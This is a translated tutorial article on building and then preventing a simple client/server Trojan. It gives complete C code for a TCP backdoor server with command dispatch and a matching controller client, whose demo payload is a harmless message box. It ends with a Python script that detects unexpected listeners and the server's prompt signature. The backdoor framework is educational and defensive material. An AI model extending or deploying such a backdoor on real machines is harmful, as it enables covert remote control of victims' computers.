Anti-virus Attack and Defense, Article 008: Analysis and Prevention of Simple Trojans

I. Preface

Generally, a Trojan has both a client and a server; what we discussed last time was only a special case. After all, not everyone knows the DOS command line, so nowadays the Trojan client is also given a very intuitive interface for easy operation. This article discusses both the client and the server. What differs from the previous discussion is that this time I put the dialog box program that simulates the virus directly into the server, so that once the connection succeeds, the server can run the dialog box program in response to a command sent by the client. With this idea you can add many functions to the server, but here we only discuss how to open the dialog box.

 

II. Server implementation

The Trojan discussed here is still a command-line Trojan. As the number of commands grows they become easy to forget, so for ease of use the server can offer simple help information: after the client enters the help command, the server sends the corresponding help text back to the client. In addition, there may be many functions, so the server can use a command dispatch mechanism that routes each command to the corresponding function. The complete code is as follows:

#include <winsock2.h>
#include <windows.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

// Port the server listens on
#define MASTERPORT 999

// Help text sent to the client in response to "help"
#define HELPMSG "help - Show Help Menu\r\n" \
                "hack - Show MessageBox\r\n" \
                "exit - Quit bdshell"

// The dialog box that stands in for the virus payload
void Hack()
{
    MessageBox(0, "You have been hacked! (By J.Y.)", "Warning", 0);
    return;
}

// Command dispatch: returns TRUE if the command was recognised and executed
BOOL Dispatch(SOCKET sock, char *szCmd)
{
    BOOL bRet = FALSE;
    // "help": send the help text (strlen + 1 so the NUL terminator is sent too)
    if (!strcmp(szCmd, "help"))
    {
        send(sock, HELPMSG, strlen(HELPMSG) + sizeof(char), 0);
        bRet = TRUE;
    }
    // "hack": show the dialog box
    else if (!strcmp(szCmd, "hack"))
    {
        Hack();
        bRet = TRUE;
    }
    return bRet;
}

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in sockAddr;
    sockAddr.sin_family = PF_INET;
    sockAddr.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
    sockAddr.sin_port = htons(MASTERPORT);
    bind(s, (SOCKADDR *)&sockAddr, sizeof(sockAddr));
    listen(s, 1);

    SOCKADDR clientAddr;
    int nSize = sizeof(SOCKADDR);
    SOCKET clientSock = accept(s, (SOCKADDR *)&clientAddr, &nSize);

    while (TRUE)
    {
        // Send the command prompt
        send(clientSock, "bdshell>", strlen("bdshell>") + sizeof(char), 0);

        char buff[MAXBYTE] = {0};
        // Receive the command sent by the client; "exit" leaves the loop
        recv(clientSock, buff, MAXBYTE, 0);
        if (!strcmp(buff, "exit"))
        {
            break;
        }

        // Dispatch and execute the command
        BOOL bRet = Dispatch(clientSock, buff);
        // Unknown command: tell the client
        if (bRet == FALSE)
        {
            send(clientSock, "command unsuccessfully!", strlen("command unsuccessfully!") + sizeof(char), 0);
        }
    }

    // Close the sockets
    closesocket(clientSock);
    closesocket(s);
    WSACleanup();
    return 0;
}

The above code is a framework that can be improved continually to add functions. Adding a function only involves the server side; the client needs no modification. However, it is not easy to develop a professional Trojan horse. The most important thing is that everything I talk about here is for learning computer security knowledge, not for sabotage. I hope you will keep that in mind.

 

III. Client implementation

The Trojan client's code just sends strings, which is very simple. The code is as follows:

#include <stdio.h>
#include <conio.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

// Port the server listens on
#define MASTERPORT 999

int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    SOCKET clientSock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in serverAddr;
    serverAddr.sin_family = PF_INET;
    // Server IP address
    serverAddr.sin_addr.S_un.S_addr = inet_addr("192.168.1.107");
    serverAddr.sin_port = htons(MASTERPORT);
    connect(clientSock, (SOCKADDR *)&serverAddr, sizeof(SOCKADDR));

    while (TRUE)
    {
        char buff[MAXBYTE] = {0};
        char cmd[MAXBYTE] = {0};
        // Receive the command prompt (or other text) sent by the server
        recv(clientSock, buff, MAXBYTE, 0);
        // Unknown command: print the error, then receive the prompt that follows it
        if (!strcmp(buff, "command unsuccessfully!"))
        {
            printf("%s\r\n", buff);
            recv(clientSock, buff, MAXBYTE, 0);
        }
        printf("%s", buff);
        // Read the command from the keyboard
        scanf("%s", cmd);
        // Send the command to the server
        send(clientSock, cmd, MAXBYTE, 0);
        // "exit": leave the loop
        if (!strcmp(cmd, "exit"))
        {
            printf("Logout!\r\n");
            break;
        }
        // "help": the server replies with the help text before the next prompt
        else if (!strcmp(cmd, "help"))
        {
            recv(clientSock, buff, MAXBYTE, 0);
            printf("%s\r\n", buff);
        }
        // Clear the buffers
        memset(buff, 0, MAXBYTE);
        memset(cmd, 0, MAXBYTE);
    }

    getch();
    closesocket(clientSock);
    WSACleanup();
    return 0;
}

In my opinion, for this C/S program the important thing is to understand the program logic clearly and make sure that the recv() and send() calls used for the different commands correspond to each other on both sides; otherwise the wrong information is received. For example, when the client sends the help command, we want first to receive the help text sent by the server and then the command prompt, so two recv() calls are needed. The hack command needs no return value, so a single recv() is enough to receive the command prompt. Special attention should be paid to this when programming.

 

IV. Actual test

I prepared two computers for testing. First run the server program on one computer, then run the client program on the other, so that the client connects directly to the server. Enter the help, hack and exit commands on the client in turn:

Figure 1 Entering commands on the client

When the hack command is entered, the server starts the dialog box program that simulates the virus:


Figure 2 The dialog box started by the client

If the exit command is entered on the client, both the client and the server exit. So the program written here works and achieves the purpose of starting the dialog box.

 

V. Trojan prevention

In fact, the implementation principle of a C/S-mode Trojan is basically the same as that of online chat: both are TCP/IP-based communication and message passing. The difference is that the Trojan client sends control commands to the server; after receiving a command, the server executes the corresponding function and sends the result back to the client, which is how remote control is implemented. If the server also hides itself, copies itself to the system directory, starts automatically... then it is a standard Trojan. It can be said that even complex Trojans work on the same principle. What differs is that a clever Trojan hides itself well, survives detection and removal by anti-virus software, and is difficult to delete completely... These will be discussed in the future.

To prevent viruses and Trojans, you must first understand them: their writing methods and operating principles must be understood before they can be dealt with effectively. Because the Trojan example here is similar to the previous one, the handling method is also similar, so I will not go into details here.
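As an added example that is not part of the original article, the following Python script shows the defender's side of what this section describes: the server above is nothing more than an unexpected TCP listener, so it can be triaged from netstat -ano output. It parses constructed sample output (the baseline port set and the PIDs are assumptions), flags listening ports outside the baseline, lists the remote peers connected to that process, and matches the NUL-terminated "bdshell>" prompt that the server sends with strlen()+1 bytes.

```python
import re

# Constructed sample of "netstat -ano" output on the infected host (not from the article).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:999            0.0.0.0:0              LISTENING       3188
  TCP    192.168.1.107:999      192.168.1.20:51422     ESTABLISHED     3188
  TCP    192.168.1.107:3389     0.0.0.0:0              LISTENING       1120
"""

# Assumed baseline: ports this host is expected to listen on.
EXPECTED_LISTEN_PORTS = {135, 445, 3389}

# One IPv4 TCP row: local addr:port, foreign addr:port, state, pid
ROW_RE = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")

def parse_netstat(text):
    """Return (local_port, foreign_addr, foreign_port, state, pid) per TCP row."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            lport, faddr, fport, state, pid = m.groups()
            rows.append((int(lport), faddr, int(fport), state, int(pid)))
    return rows

def unexpected_listeners(text, expected_ports=EXPECTED_LISTEN_PORTS):
    """Map each listening port outside the baseline to the PID that owns it."""
    return {lp: pid for lp, _, _, st, pid in parse_netstat(text)
            if st == "LISTENING" and lp not in expected_ports}

def controllers_of(text, pid):
    """Remote endpoints with established sessions to that PID (the controlling client)."""
    return [(fa, fp) for _, fa, fp, st, p in parse_netstat(text)
            if p == pid and st == "ESTABLISHED"]

# The server sends its prompt with strlen()+1 bytes, so the NUL terminator
# goes on the wire too: "bdshell>\0" is a usable network signature.
PROMPT_SIG = b"bdshell>\x00"

def has_bdshell_prompt(payload):
    """True if a captured server-to-client TCP payload starts with the prompt."""
    return payload.startswith(PROMPT_SIG)

if __name__ == "__main__":
    for port, pid in unexpected_listeners(SAMPLE_NETSTAT).items():
        peers = controllers_of(SAMPLE_NETSTAT, pid)
        print(f"unexpected listener tcp/{port} pid={pid} peers={peers}")
```

On a real host, feed the output of netstat -ano to unexpected_listeners() and check the flagged PID in Task Manager or tasklist; a process that also matches the prompt signature in captured traffic is the server from this article.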

 

VI. Summary

The articles on simple Trojans and viruses come to an end here. Together with the previous articles, we can see that hacker programming is not difficult: there are no very complex programs or algorithms, and it is nothing more than combining various API functions. What matters is how much the programmer knows about the computer system; the more they know, the more powerful the viruses and Trojans they write, and the harder they are to detect and remove. From my analysis articles, it may seem that detection and removal are easier than writing viruses and Trojans. This is true, but only because the examples I gave are relatively simple and I understand the operating mechanisms of these programs well, so handling them is fast. In actual anti-virus work, analysing a very complex virus may take several days. Although there are now automated detection tools, the technology of both sides keeps improving in the contest between attack and defense; it is a contest of intelligence and energy. Of course, I hope that the security side will win in the end.
